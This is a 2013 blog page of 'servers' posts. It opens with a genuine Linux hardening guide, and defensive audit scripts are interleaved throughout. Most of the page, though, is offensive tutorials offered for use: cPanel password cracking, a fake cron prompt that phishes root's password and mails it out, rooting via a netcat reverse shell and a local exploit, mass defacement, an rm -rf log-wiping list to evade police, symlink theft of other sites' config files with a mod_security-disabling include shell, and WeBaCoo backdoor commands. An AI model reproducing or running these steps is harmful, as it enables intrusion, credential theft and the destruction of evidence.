Showing posts with label servers. Show all posts

Friday, October 4, 2013

How to Secure a Linux Server


The free, open-source GNU/Linux operating system is getting better each year for desktop use, but it's been a major contender for server use since the late 1990s. With popularity, however, it has become profitable for thieves to break into Linux servers and use them for spamming, scams, and serving pornography, among other things. Here are some ways you can protect your server from such a fate.

Steps

  1. Learn to use Linux from the shell (command line). Every layer of software added on to make your system administration "easier" actually adds more methods for crackers to gain access to your machine and also reduces performance. All the further steps will assume your familiarity with using a shell.



  • Using lsof -i (or ss -ltnup / netstat -tulpn, which show the same thing on newer systems), find out on which ports your computer is listening for connections:

    ns003:~# lsof -i
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    named 17829 root 4u IPv6 12689530 UDP *:34327
    named 17829 root 6u IPv4 12689531 UDP *:34329
    named 17829 root 20u IPv4 12689526 UDP ns003.unternet.net:domain
    named 17829 root 21u IPv4 12689527 TCP ns003.unternet.net:domain (LISTEN)
    named 17829 root 22u IPv4 12689528 UDP 209.40.205.146:domain
    named 17829 root 23u IPv4 12689529 TCP 209.40.205.146:domain (LISTEN)
    lighttpd 17841 www-data 4u IPv4 12689564 TCP *:www (LISTEN)
    sshd 17860 root 3u IPv6 12689580 TCP *:ssh (LISTEN)
    sshd 17880 root 3u IPv6 12689629 TCP *:8899 (LISTEN)
    sshd 30435 root 4u IPv6 74368139 TCP 209.40.205.146:8899->dsl-189-130-12-20.prod-infinitum.com.mx:3262 (ESTABLISHED)

  • If in doubt, hack it out! Shut down any unknown or unneeded services, using the appropriate tools for your Linux distribution, such as update-rc.d on Debian systems (systemctl disable on systemd-based ones), or in some cases editing the /etc/inetd.conf or /etc/xinetd.d/* files. Along with this, get rid of any tools your server provider added for system administration, such as Plesk: every extra web-facing control panel is another way in.

  • Don't allow root logins on your primary sshd port 22 (set PermitRootLogin to "no"); many automated tools run brute-force attacks on that port. If you need direct root access at all, set up a secondary port for it that only accepts public keys, never passwords:
    • Copy the sshd_config file to root_sshd_config, and change the following items in the new file:
      • Port from 22 to some other number, say 8899 (don't use this one! make up your own!)
      • PermitRootLogin from "no" (you were supposed to set it to "no" for port 22, remember?) to "yes"
      • AllowUsers root add this line, or if it exists, change it to allow only root logins on this port
      • PasswordAuthentication no and ChallengeResponseAuthentication no uncomment these lines if they are commented out, and make sure both say "no" instead of "yes"; with only the second one set, password logins are still possible
      • PidFile /var/run/root_sshd.pid add this line so the second daemon does not overwrite the pid file of the one on port 22
      Note that sshd uses the first value it finds for each keyword, so edit the existing line rather than appending a second one at the end of the file.
    • Test this command: 

      /usr/sbin/sshd -D -f /etc/ssh/root_sshd_config
      (sshd insists on being started by absolute path) and see if it works correctly -- try logging in from another computer (you must have already set up public-key authentication between the two computers) using: 

      ssh -p8899 root@my.remote.server
      and if so, control-C at the above (sshd) command to stop the daemon, then add this to the end of /etc/inittab: 

      rssh:2345:respawn:/usr/sbin/sshd -D -f /etc/ssh/root_sshd_config
    • Restart the init task: # init q This will run your "root ssh daemon" as a background task, automatically restarting it in case of failure. On systems that boot with systemd instead of SysV init there is no /etc/inittab; use a second service unit (a copy of the distribution's ssh service unit with the -f option added) and enable it with systemctl instead.
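The procedure above leaves you with two sshd configurations, and the most common way for it to go wrong is a keyword that is set twice: sshd takes the first value it sees. The script below is an added example (not from the article) that checks the effective values of the keywords this section cares about; the two sample config files are constructed here, and the /etc/ssh paths in the comments are where the real ones would live.

```shell
#!/bin/sh
# Added example (not from the original article): audit an sshd_config for the
# settings this section asks for. The two sample configs are constructed here;
# on a real host point the functions at /etc/ssh/sshd_config and
# /etc/ssh/root_sshd_config instead.

# sshd_setting FILE KEYWORD
# Print the effective value of KEYWORD. sshd uses the FIRST uncommented
# occurrence of a keyword (values inside Match blocks apply only there), so
# appending "PermitRootLogin no" below an earlier "PermitRootLogin yes"
# changes nothing; this is a common reason hardening "does not take".
sshd_setting() {
    awk -v key="$2" '
        /^[ \t]*#/ || NF == 0       { next }            # comment or blank line
        tolower($1) == "match"      { exit }            # stop at the first Match block
        tolower($1) == tolower(key) { print $2; exit }  # first match wins
    ' "$1"
}

# audit_sshd FILE "Keyword value" ...
# Report every keyword whose effective value differs from the wanted one and
# return the number of mismatches (0 means the file passes).
audit_sshd() {
    cfg=$1; shift
    fails=0
    for pair in "$@"; do
        key=${pair%% *}; want=${pair#* }
        have=$(sshd_setting "$cfg" "$key")
        if [ "$have" != "$want" ]; then
            echo "FAIL $key: effective '${have:-unset}', wanted '$want'"
            fails=$((fails + 1))
        fi
    done
    return "$fails"
}

# Constructed sample configs for the demonstration.
DEMO=$(mktemp -d)
# Primary port: the admin appended "no" at the bottom, but the earlier "yes" wins.
printf '%s\n' 'Port 22' 'PermitRootLogin yes' 'PasswordAuthentication yes' \
    '# appended later:' 'PermitRootLogin no' > "$DEMO/sshd_config"
# Root-only secondary port, keys only, with its own PidFile so the two daemons
# do not overwrite each other's pid file.
printf '%s\n' 'Port 8899' 'PermitRootLogin yes' 'AllowUsers root' \
    'PasswordAuthentication no' 'ChallengeResponseAuthentication no' \
    'PubkeyAuthentication yes' 'PidFile /var/run/root_sshd.pid' > "$DEMO/root_sshd_config"

echo "== $DEMO/sshd_config (port 22) =="
audit_sshd "$DEMO/sshd_config" "PermitRootLogin no" "PasswordAuthentication no" \
    && echo "pass"
echo "== $DEMO/root_sshd_config (root-only port) =="
audit_sshd "$DEMO/root_sshd_config" "PermitRootLogin yes" "AllowUsers root" \
    "PasswordAuthentication no" "ChallengeResponseAuthentication no" && echo "pass"
```

Run it after every edit of either file; a non-zero return from audit_sshd is the signal that the hardening did not take. It complements rather than replaces sshd -t -f FILE, which checks syntax but not intent.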

    • Tips

      • Check your log files regularly to see what types of attacks are being run against your server. /var/log/auth.log (Debian) or /var/log/secure (Red Hat) is a typical place to find attempted logins; this is what a password-guessing run against sshd looks like: 
        Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from ::ffff:58.29.238.252
        Jan 18 10:48:49 ns003 sshd[23833]: Illegal user rosemarie from ::ffff:58.29.238.252
        Jan 18 10:48:51 ns003 sshd[23838]: Illegal user ruth from ::ffff:58.29.238.252
        Jan 18 10:48:54 ns003 sshd[23840]: Illegal user sabine from ::ffff:58.29.238.252
        Jan 18 10:48:57 ns003 sshd[23845]: Illegal user sandra from ::ffff:58.29.238.252
      • Regularly upgrade your operating system to get security fixes. On Debian: apt-get update && apt-get upgrade (update alone only refreshes the package lists).
      • Monitor news on vulnerabilities at http://www.securityfocus.com/, your distribution's security-announce mailing list and related websites.
      • Try installing grsecurity and/or SELinux and/or AppArmor and/or PaX.
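The five lines above are one dictionary run from a single address. As an added example, not from the article, the script below tallies such attempts per source address so a run stands out from background noise; the log lines it works on are constructed (the five from this section plus three more), and the path names in the comments assume Debian or Red Hat layouts.

```shell
#!/bin/sh
# Added example (not from the article): tally failed ssh logins per source
# address from an auth log. The log lines are constructed for the
# demonstration; on a real host pass /var/log/auth.log (Debian) or
# /var/log/secure (Red Hat).

# ssh_fail_count LOG IP -> number of invalid-user / failed-password attempts from IP
ssh_fail_count() {
    awk -v want="$2" '
        /sshd\[[0-9]+\]: (Illegal user|Invalid user|Failed password)/ {
            ip = ""
            for (i = 1; i < NF; i++) if ($i == "from") ip = $(i + 1)
            sub(/^::ffff:/, "", ip)      # strip the IPv4-mapped IPv6 prefix older logs use
            if (ip == want) n++
        }
        END { print n + 0 }
    ' "$1"
}

# ssh_bruteforce_summary LOG [THRESHOLD]
# -> "count ip" for every source at or above THRESHOLD (default 3), worst first
ssh_bruteforce_summary() {
    awk -v thr="${2:-3}" '
        /sshd\[[0-9]+\]: (Illegal user|Invalid user|Failed password)/ {
            ip = ""
            for (i = 1; i < NF; i++) if ($i == "from") ip = $(i + 1)
            sub(/^::ffff:/, "", ip)
            if (ip != "") n[ip]++
        }
        END { for (ip in n) if (n[ip] >= thr) print n[ip], ip }
    ' "$1" | sort -rn
}

# Constructed sample log: the run from the article, a second source that
# gave up after two tries, and one legitimate key login.
LOG=$(mktemp)
cat > "$LOG" <<'EOF'
Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from ::ffff:58.29.238.252
Jan 18 10:48:49 ns003 sshd[23833]: Illegal user rosemarie from ::ffff:58.29.238.252
Jan 18 10:48:51 ns003 sshd[23838]: Illegal user ruth from ::ffff:58.29.238.252
Jan 18 10:48:54 ns003 sshd[23840]: Illegal user sabine from ::ffff:58.29.238.252
Jan 18 10:48:57 ns003 sshd[23845]: Illegal user sandra from ::ffff:58.29.238.252
Jan 18 10:52:03 ns003 sshd[23901]: Invalid user admin from 203.0.113.7
Jan 18 10:52:06 ns003 sshd[23901]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
Jan 18 11:01:12 ns003 sshd[23950]: Accepted publickey for alice from 192.0.2.10 port 51234 ssh2
EOF

echo "== sources with 3 or more failures =="
ssh_bruteforce_summary "$LOG" 3
```

The same counting, done continuously and followed by a firewall rule, is what fail2ban's sshd jail does; the script is the one-off version for reading a log you have been handed.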

      Warnings

      • Nothing you can do will make your server completely secure. Have backups of all important files, and a backup plan in place in case the worst happens.
      • Never trust a server that has been cracked. A cracker has access to 100% of the system once they have root access.

      Tuesday, September 24, 2013

      [TUT] cPanel Cracking

      Things required:
      • Shelled site (download the best shells here)
      • cPanel password cracker (download; archive password: www.hax0rtools.com)

      Step-by-step tutorial:
      • First open your shell and upload the cPanel password cracker shell.
      • Then scroll down and click on User.

      • After you have clicked on User, you will get all the usernames of the cPanel accounts below. The next step is to get a good password list for a dictionary attack. Once you have it, copy a username, paste it in the username box (above), paste the password list in the password box, and finally click on Start.

      Tip: the password list should be short and effective.

      • When the cracking is finished, you will see the result.
      • With the login details you can log in at www.site.com:2082 or www.site.com/cpanel.
      FOR EDUCATIONAL PURPOSE ONLY

      Root server without local root exploit


      Many hackers find it hard to find a local root exploit for rooting a server. So here are a few methods you can try to gain root access without a local root exploit.

      1. Custom Cron Tab Scripts

      Cron jobs are tasks scheduled to run at a specific time. If root has a custom script run from cron and that script is writable by us, whatever we put in it runs with root's privileges. The approach this tutorial takes is to make the script print a fake error and prompt for root's password.
      First, check whether there are any cron jobs:
       crontab -l 
      (this lists only the current user's crontab; root's jobs live in /etc/crontab, /etc/cron.d/* and the /etc/cron.{hourly,daily,weekly,monthly} directories, which are usually readable by everyone).
      If you see any custom script, check whether you can write to it.
      Let's say we found a custom script at /bin/cronscript.
      To check the permissions, type:
       stat /bin/cronscript 
       (If the mode in the output looks like "-rwxrwxrwx", i.e. the last group of three contains a "w", anyone can edit the file.) 
      Let's edit the file and send a fake error message.
      Make a copy of the original script at /bin/cronscript.bak:
       cp /bin/cronscript /bin/cronscript.bak 
      Edit /bin/cronscript like this (replace the e-mail address and the script name with your own):
       #!/bin/bash
       echo "A System Error Occurred!"
       echo ""
       echo "Error Code: #131425"
       echo ""
       echo "Update to get the latest patch for this security issue."
       read -s -p "[sudo] password for root: " rootpasswd
       echo ""
       echo "su: Authentication failure"
       echo ""
       sudo apt-get update && sudo apt-get upgrade
       echo "The Password is: $rootpasswd" > .kod
       mail -s "Root's Password" "email@address.com" < .kod
       rm .kod
       mv /bin/cronscript.bak /bin/cronscript
      (The shebang is bash rather than sh because read -s -p is a bash extension, and the last line restores the original by its full path.)
      After you save the file, type: chmod +x /bin/cronscript to keep it executable.
      This script will:
      - print a fake error message
      - ask for root's password
      - mail the password to your address (make sure the mail command is installed)
      - put the original file back

      When root runs the script and types his password, it is sent to you. Note that a job started by cron has no terminal attached, so nobody sees the prompt and nothing is read; the trick only pays off if root also runs the script by hand. It helps to know some Bash programming.

      2. Enumerating all SUID files

      A setuid (SUID) file is an executable that runs with the privileges of its owner rather than of the user who starts it; when the owner is root, whoever runs it has root's privileges for as long as the program runs.
      What this means for you: a root-owned setuid program that is buggy, misconfigured or writable is a way to escalate privileges without a kernel exploit. Failing that, you can social-engineer a privileged user, as in the previous method.
      To find all setuid files owned by root, type:
       find / -user root -perm -4000 -type f -print 2>/dev/null 
      This lists all root-owned setuid files in your terminal. Take your time and check them, as they can help you escalate privileges!
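The two weaknesses just described, a root cron script that unprivileged users can write to and a root-owned setuid program, are exactly what an administrator audits for. The script below is an added example (not from the post) that runs both checks on a constructed directory tree so it works anywhere; the script names, the crontab lines and the two setuid files are invented for the demonstration, and on a real host you would feed it /etc/crontab and /etc/cron.d/* and run find_setuid against / as root.

```shell
#!/bin/sh
# Added example, not from the original post: the audit an administrator runs
# for the two weaknesses above. Everything lives in a constructed temp tree so
# it runs anywhere; on a real host feed writable_cron_scripts /etc/crontab and
# each file in /etc/cron.d, and run find_setuid / as root.

# mode_string FILE -> the ls-style mode, e.g. -rwxrwxrwx (portable, unlike stat -c)
mode_string() { ls -ld "$1" | awk '{ print $1 }'; }

# writable_cron_scripts CRONTAB -> "mode path" for each command in a system
# crontab (m h dom mon dow user command ...) whose script can be modified by
# its group or by everyone. Whatever is written there runs as the job's user.
writable_cron_scripts() {
    awk '!/^[ \t]*#/ && $1 !~ /=/ && NF >= 7 { print $7 }' "$1" |
    while read -r prog; do
        case $prog in /*) ;; *) continue ;; esac   # only absolute paths can be checked
        [ -f "$prog" ] || continue
        mode=$(mode_string "$prog")
        case $mode in
            ?????w*|????????w*) echo "$mode $prog" ;;   # w at position 6 (group) or 9 (other)
        esac
    done
}

# find_setuid ROOT -> sorted regular files under ROOT with the setuid bit.
# Each runs as its owner no matter who starts it; a root-owned one that is
# buggy or planted is a direct route to root.
find_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# new_setuid BASELINE ROOT -> setuid files present now but not in a baseline
# list taken earlier (the baseline is a sorted find_setuid listing).
new_setuid() {
    find_setuid "$2" | comm -13 "$1" -
}

# Constructed sample tree.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/bin" "$DEMO/etc"
printf '#!/bin/sh\necho backup\n'  > "$DEMO/bin/backup.sh";  chmod 755 "$DEMO/bin/backup.sh"
printf '#!/bin/sh\necho cleanup\n' > "$DEMO/bin/cleanup.sh"; chmod 777 "$DEMO/bin/cleanup.sh"  # anyone can edit
printf '%s\n' 'SHELL=/bin/sh' '# nightly jobs' \
    "0 2 * * * root $DEMO/bin/backup.sh --full" \
    "30 2 * * * root $DEMO/bin/cleanup.sh" > "$DEMO/etc/crontab"
: > "$DEMO/bin/passwd_demo"; chmod 4755 "$DEMO/bin/passwd_demo"   # setuid, known and baselined
find_setuid "$DEMO" > "$DEMO/suid.baseline"
: > "$DEMO/bin/planted";     chmod 4755 "$DEMO/bin/planted"       # setuid, appeared afterwards

echo "== cron scripts an unprivileged user could edit =="
writable_cron_scripts "$DEMO/etc/crontab"
echo "== setuid files not in the baseline =="
new_setuid "$DEMO/suid.baseline" "$DEMO"
```

Keep the baseline file somewhere the server cannot write to (or just mail it to yourself); a setuid file that appears between two runs is the thing to investigate first.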

      3. Brute Forcing

      I know what you are thinking after seeing the title, but this is different: the tool we are going to use is called Rootdabitch.
      What is so special about it?
      The magic of this tool is that it works in the background, so you can leave it running for days until you have results; when the password is cracked it is mailed to you :)
      For this you need a PHP shell, a reverse shell or SSH access to the target to run the tool. You can get the tool here: Rootdabitch v0.1
      Usage:
      ./rootdabitch.sh youremail@site.com
      For kiddies:
      First download rootdabitch to the server:
      wget http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip
      Extract it with the following command:
      unzip rootdabitch-0.1.zip
      Make it executable (mode 755):
      chmod 755 rootdabitch.sh
      Finally run the script:
      ./rootdabitch.sh youremail@site.com
      That's it: chmod it and run the script. If the password is cracked you will get a mail with the root password in the attached file "passwords.txt".
      That's all, have a great day :)

      MASS DEFACE TUTORIAL

      Today I will tell you how to mass deface in a few steps, so let's start.

      Things required:

      • Rooted server (see the Linux server rooting tutorial further down this page)
      • Mass deface script (download from here; archive password: www.hax0rtools.com)
      Step-by-step guide:
      • First we have to download our mass deface script; as usual we will use wget.
      Type: wget www.somesite.in/massdeface.zip
      • As we have downloaded a zip file, we now unzip it by typing
      Type: unzip massdeface.zip

      • Once you have unzipped it, run the script by typing
      Type: perl massdeface.pl
      • Run without arguments, the script prints its usage [ perl mass.pl /tmp/index.html ], so that is how we have to run it; but before we do so we have to download our deface page, again with wget.
      Type: wget http://www.somesite.com/index.html

      • Once we have downloaded our deface page, we run the final command to mass deface.
      Type: perl massdeface.pl /tmp/index.html


      Hope all of you like my mass deface tutorial!
      Your comments would be appreciated :)

      LINUX SERVER ROOTING Tutorial

      Hello Hax0rtools.com readers, today I will show you how to root a server.

      Root is the administrator of the whole server. Someone with root access can do anything with the server: delete and copy anything on it, or deface all the home pages (mass deface).

      Although there are mainly 3 ways to get into a server, here we take the first method, a local root exploit.

      NEEDS :

      • Netcat (download from here)
      • Shelled site (best shells here)
      • Local root exploit (which you can find here, or download this collection here)
      STEPS:

      • In Run type cmd, then type cd C:\Program Files\Netcat (save netcat in that directory first).
      After that type: nc -n -l -v -p 443 , and you will get this -


      Now open the URL where you uploaded your shell and connect using the back-connect option of the shell (be careful: some shells do not have this option, and do not use a proxy, Tor or a VPN, since the server has to reach your listener directly). When the connection is established you will see something like this -



      Now that you are connected, we have to get a local root exploit matching the kernel, which here is 2.6.18-374 from 2011.


      • First we have to upload our exploit into a writable folder; the simplest is to change directory to /tmp, which is writable by everyone.
       command to change dir to /tmp : cd /tmp
      • To upload the exploit we will use wget.
      Now type: wget http://www.example.com/exploit.c 

      Now the exploit is in the /tmp folder.

       


      • (CASE 1) If you have uploaded your exploit as source (exploit.c) we have to compile it, so type the following command.
      Type : gcc exploit.c -o exploit

      Note that in the above command "exploit" is the name of your exploit (exploit.c). If it compiles properly with no errors or warnings you can proceed; if you get an error, find another exploit.

      (CASE 2) If you have uploaded your exploit in a zip file, unzip it by typing the command below.

      Type: unzip exploit.zip 

      • After all the above steps, it is time to make the file executable, so type the following command (chmod +x exploit is enough; the tutorial uses 777):
      Type: chmod 777 exploit
      • Now it is time to run the exploit, so type the following command:
      Type: ./exploit

      Now the exploit runs and the server is rooted ;) . To check whether we got root we can type 

      Type: id or whoami  

      NOW HOW TO CLEAR THE LOGS AND GET OUT OF THE SERVER SAFELY

      If you do not want to get caught by the cops, delete the logs using the following commands:

      rm -rf /tmp/logs
      rm -rf $HISTFILE
      rm -rf /root/.ksh_history
      rm -rf /root/.bash_history
      rm -rf /root/.bash_logout
      rm -rf /usr/local/apache/logs
      rm -rf /usr/local/apache/log
      rm -rf /var/apache/logs
      rm -rf /var/apache/log
      rm -rf /var/run/utmp
      rm -rf /var/logs
      rm -rf /var/log
      rm -rf /var/adm
      rm -rf /etc/wtmp
      rm -rf /etc/utmp
      history -c
      find / -name "*.bash_history" -exec rm -rf {} \;
      find / -name "*.bash_logout" -exec rm -rf {} \;
      find / -name "log*" -exec rm -rf {} \;
      find / -name "*.log" -exec rm -rf {} \;

      Keep in mind that wiping /var/log wholesale is itself the loudest possible sign that someone was here, and it does nothing about log lines already forwarded to a remote syslog host.
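The list above is what an incident responder expects to find missing. As an added example (not from the post), the script below runs the checks that catch it: expected logs that are gone, truncated to zero length or replaced with a link to /dev/null, and log files that have stopped being written to. It works on a constructed log directory; the file names mirror Debian's /var/log, and find -mmin is a GNU/BSD extension rather than POSIX.

```shell
#!/bin/sh
# Added example, not from the original post: spot the log wipe described above.
# Works on a constructed log directory; on a real host point it at /var/log.
# The durable defence is off the box: forward logs to a remote syslog host that
# root on this server cannot reach.

# check_logs LOGDIR NAME... -> one line per problem among the expected logs
# (missing, empty, or replaced by a symlink such as wtmp -> /dev/null);
# returns the number of findings, 0 when everything is in place.
check_logs() {
    dir=$1; shift
    findings=0
    [ -d "$dir" ] || { echo "MISSING-DIR $dir"; return 1; }
    for name in "$@"; do
        p=$dir/$name
        if [ -L "$p" ]; then
            echo "SYMLINK $p -> $(readlink "$p")"; findings=$((findings + 1))
        elif [ ! -e "$p" ]; then
            echo "MISSING $p"; findings=$((findings + 1))
        elif [ ! -s "$p" ]; then
            echo "EMPTY $p"; findings=$((findings + 1))
        fi
    done
    return "$findings"
}

# stale_logs LOGDIR MINUTES -> log files not written to for MINUTES, which on a
# busy server means the daemon feeding them was stopped (find -mmin: GNU/BSD).
stale_logs() {
    find "$1" -type f -mmin +"$2" 2>/dev/null | sort
}

# Constructed sample directory.
DEMO=$(mktemp -d)
mkdir -p "$DEMO/log"
echo 'Jan 18 10:48:46 ns003 sshd[23829]: Illegal user rosa from 58.29.238.252' > "$DEMO/log/auth.log"
: > "$DEMO/log/syslog"                                  # truncated to zero length
ln -s /dev/null "$DEMO/log/wtmp"                        # "last" now shows nothing
echo 'old entry' > "$DEMO/log/kern.log"
touch -t 201301010000 "$DEMO/log/kern.log"              # untouched since 2013
# messages is simply gone

echo "== expected logs under $DEMO/log =="
check_logs "$DEMO/log" auth.log syslog wtmp messages || echo "$? finding(s)"
echo "== logs silent for more than an hour =="
stale_logs "$DEMO/log" 60
```

A missing file is the easy case; the symlink and the silent-but-present log are what a quick glance at ls misses, which is why the check spells them out separately.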

      I hope you have learned how to root a server. My next tutorial will be about how to mass deface after rooting a server.

      ANY PROBLEM? SHARE IT VIA COMMENT:

      Symlink Tutorial for beginners

      What are symbolic links?

      In computing, a symbolic link (also symlink or soft link) is a special type of file that contains a reference to another file or directory in the form of an absolute or relative path and that affects pathname resolution.

      How to symlink on a web server?

      For this you need shell access on the website, with a web shell like GNY, C99 or r57. It looks like this:


      Now you need to create a directory with any name, like sym or test.

      After creating the directory you need two files:
      1. A zip archive containing a symbolic link, named e.g. 1.txt, that points to "/" (that is what the tutorial means by a txt file that "includes /").
      2. A .htaccess file with the following contents:

      Options Indexes FollowSymLinks
      DirectoryIndex test.htm 
      AddType txt .php
      AddHandler txt .php

      Save it as ".htaccess". The first line lets Apache follow the link and list directories; the last two make it serve .php files as plain text instead of executing them.

      Now upload both files. After uploading, unzip the archive with this command:

      unzip "file name"

      After unzipping you will see the txt file there. Now open the corresponding path in your web browser.

      It looks like this.

      Now just click on the 1.txt file that came out of the zip. It shows all the directories of the web server; check the image below:



      OK, done. Now in the symlink we check the directory path, which looks like

      1. /home/"Website Username"/public_html/
      2. /hsphere/local/home/c283273/

      There are different paths; you just need to find the right one.

      If you click on "home" you get a 403 Forbidden error; never mind, after you get this error you need to add the website's username to the path.

      To find the web users you need to execute this command:

      cat /etc/passwd

      The path is "/home/"website username"/public_html/"


      After executing the cat command it looks like the image above.

      Now just find a specific target that has an ADMIN LOGIN PAGE and a CONFIG FILE.

      How do you find this specific target site?

      You need the server IP and www.bing.com


      To find Joomla, WordPress and PHP sites we can use these dorks:
      1. ip:123.x.x.x index.php?option=
      2. ip:123.x.x.x "Powered By WordPress"
      3. ip:123.x.x.x .php?id=

      and more......

      Having found the target site, you need to find its config file. In Joomla the config file is "configuration.php", in WordPress "wp-config.php", etc.

      You cannot see the file directly like this:

      www.Target.com/wp-config.php
      www.Target.com/configuration.php

      But through the symlink, the .htaccess above makes Apache serve the config file as text, so you can read it with right click and view source.


      It looks like the image above.

      This config file holds the site's database information: database name, username, password, etc.

      With that you can log in to the site's database and edit or delete specific columns, fields, etc.

      But we need to change the admin password. In many cases the stored password is an MD5 hash or base64 encoded; you need to crack the hash or decode it, that's it.

      After changing the password you know what to do...!!!

      Bypass 403 Forbidden and "can't read /etc/named.conf" errors

      Nowadays most Linux servers show this error when you try to symlink them. Most servers that show 403 Forbidden also give a "can't read /etc/named.conf" error when you try to symlink with scripts like Symlink_Sa, the Madspot Security Team shell or whatever script is used for automated symlinking (the scripts read named.conf to get the list of hosted domains).

      This can be bypassed by reading /etc/passwd instead, and Symlink_Sa 3.0 can be used for that.

      I will post the download links of the shells used in this tutorial.

      The best scripts that can bypass "can't read /etc/named.conf" are:

      1. Config Fucker by Web Root Hack Tools (mass symlink of config files)
      2. Config Killer by Team Indishell (mass symlink of config files, PHP-based script)
      3. Symlink Pain [~] allsoft.pl (Perl script to mass symlink config files)
      4. Symlink_Sa 3.0 automated symlink script

      Usage: for Config Fucker, Config Killer and the Symlink Pain [~] Perl script, just upload them to the server, making sure you create a new directory for them. Upload the script, run cat /etc/passwd to read the user list from the server, copy it, open your script, paste it there and click on Get Config, and you are done. Then open the link of the folder you created, e.g. if the script is at site.com/sen/allsoft.pl you open site.com/sen/ and all the config files will be there.

      Note: it is better to create a php.ini file before you do this, for a 100% result.

      I will post the download links for all 4 shells mentioned.

      I will also be using another private shell, which I will not share (priv8): the Mannu shell coded by Team Indishell, which bypasses the "can't read /etc/named.conf" error easily. A 403 Forbidden server cannot be bypassed with this shell, though.

      So if we cannot symlink to the public_html/ of the website we can use the Symlink_Sa 3.0 script's Symlink Bypass option -

      Now we can easily symlink to the /public_html/ path of each website.

      Some servers show a 403 Forbidden error when you try to symlink them, so now let's see how to bypass it.



      For the 403 Forbidden error I will be using the following shells:

      1. Dhanush shell coded by Arjun (this shell automatically creates .htaccess, php.ini and ini.php files after you log in)
      2. Mannu shell by Team Indishell (private!)
      3. Symlink_Sa 3.0 script

      I will post the download links of the Dhanush shell and Symlink_Sa 3.0 (the Mannu shell is private, as I said).

      So what is the trick that lets us bypass 403 Forbidden? It is just the .htaccess and php.ini, which contain the following code:

      .htaccess

      <IfModule mod_security.c>
      SecFilterEngine Off
      SecFilterScanPOST Off
      </IfModule>


      php.ini

      <?
      echo ini_get("safe_mode");
      echo ini_get("open_basedir");
      include($_GET["file"]);
      ini_restore("safe_mode");
      ini_restore("open_basedir");
      echo ini_get("safe_mode");
      echo ini_get("open_basedir");
      include($_GET["ss"]);
      ?>


      1.) 403 Forbidden error:

      2.) Open the Dhanush shell, which automatically creates .htaccess, php.ini and ini.php.

      3.) Use the Mannu shell to check whether we bypassed the 403 error:

      4.) 403 Forbidden bypassed, with access to the public_html/ path.

      Bypassed "can't read /etc/named.conf" and the 403 Forbidden error.

      Here is the download link for all the shells and scripts I used: CLICK HERE
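Both tricks above depend on two things a hosting administrator can check for: symbolic links under a document root that point outside it, and .htaccess files that turn on FollowSymLinks, remap .php to plain text, or switch mod_security off. The script below is an added example (not code from either post, nor from any of the shells named) that runs both checks on a constructed document root; it assumes GNU readlink -f, and the other_user directory and the wp-config.php in it are invented for the demonstration.

```shell
#!/bin/sh
# Added example, not from the original posts: what a hosting admin checks for
# after reading the two tricks above, run here on a constructed document root.
# On a shared host point it at each /home/*/public_html. Assumes GNU readlink -f.

# escaping_symlinks DOCROOT -> every symlink under DOCROOT whose target
# resolves outside DOCROOT (the "1.txt -> /" trick), as "link -> target".
escaping_symlinks() {
    root=$(readlink -f "$1")
    find "$root" -type l 2>/dev/null | while read -r link; do
        target=$(readlink -f "$link") || target=$(readlink "$link")  # dangling: raw value
        case $target in
            "$root"|"$root"/*) ;;                  # stays inside the docroot
            *) echo "$link -> $target" ;;
        esac
    done
}

# risky_htaccess DOCROOT -> .htaccess files that enable symlink following,
# re-map .php to another type or handler (source disclosure), or switch
# mod_security off.
risky_htaccess() {
    find "$(readlink -f "$1")" -name .htaccess -type f 2>/dev/null | while read -r f; do
        if grep -Eiq 'FollowSymLinks|Add(Type|Handler)[^#]*\.php|Sec(Filter|Rule)Engine[[:space:]]+Off' "$f"; then
            echo "$f"
        fi
    done
}

# Constructed sample document root.
DEMO=$(mktemp -d)
WEB=$DEMO/public_html
mkdir -p "$WEB/assets/css" "$WEB/sym" "$DEMO/other_user"
printf 'DB_PASSWORD=secret\n' > "$DEMO/other_user/wp-config.php"    # another tenant's file
ln -s assets/css "$WEB/css"                                          # harmless, stays inside
ln -s / "$WEB/sym/1.txt"                                             # the trick from the tutorial
ln -s "$DEMO/other_user/wp-config.php" "$WEB/sym/cfg.txt"
printf 'Options -Indexes\n' > "$WEB/.htaccess"                       # benign
printf '%s\n' 'Options Indexes FollowSymLinks' 'AddType txt .php' \
    'AddHandler txt .php' > "$WEB/sym/.htaccess"                     # from the tutorial

echo "== symlinks leaving $WEB =="
escaping_symlinks "$WEB"
echo "== .htaccess files worth a look =="
risky_htaccess "$WEB"
```

Apache's own guard against the first trick is Options SymLinksIfOwnerMatch in place of FollowSymLinks, with AllowOverride restricted so that a tenant's .htaccess cannot turn FollowSymLinks (or the .php remapping) back on; the scan above is for finding out whether that guard is actually in place.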


      Sunday, September 22, 2013

      Backdoor a WEB SERVERS WITH WEBACOO

      WeBaCoo (Web Backdoor Cookie) is a web backdoor script kit that provides a terminal-like connection over HTTP between a client and a web server. It is a post-exploitation tool for keeping access to a server that has already been hacked.
      WeBaCoo was designed to operate under the radar of up-to-date AV, NIDS, IPS, network firewalls and application firewalls, providing a stealthy way to execute commands on the compromised server. The obfuscated PHP file carries the command and its output in the Cookie headers of ordinary-looking HTTP requests and responses.
      WeBaCoo can generate the PHP backdoor code from predefined payloads. It also offers a "terminal" mode in which the user opens a remote connection to the server and executes commands with the privileges of the web server process.
      It is often used when the server does not have netcat.
      INSTALLATION:
      git clone git://github.com/anestisb/WeBaCoo.git
      or
      wget http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz
      ./webacoo.pl -h
      COMMANDS:
      1) Create an obfuscated backdoor 'backdoor.php' with the default settings:
      ./webacoo.pl -g -o backdoor.php
      2) Create a raw (de-obfuscated) backdoor 'raw-backdoor.php' using function number 4:
      ./webacoo.pl -g -o raw-backdoor.php -f 4 -r
      3) Open a "terminal" connection to the remote host with the default settings:
      ./webacoo.pl -t -u http://127.0.0.1/backdoor.php
      4) Open a "terminal" connection to the remote host with a custom cookie name and delimiter:
      ./webacoo.pl -t -u http://127.0.0.1/backdoor.php -c "Test-Cookie" -d "TTT"
      5) Open a "terminal" connection to the remote host through an HTTP proxy:
      ./webacoo.pl -t -u http://10.0.1.13/backdoor.php -p 127.0.0.1:8080
      6) Open a "terminal" connection through an HTTP proxy with basic authentication:
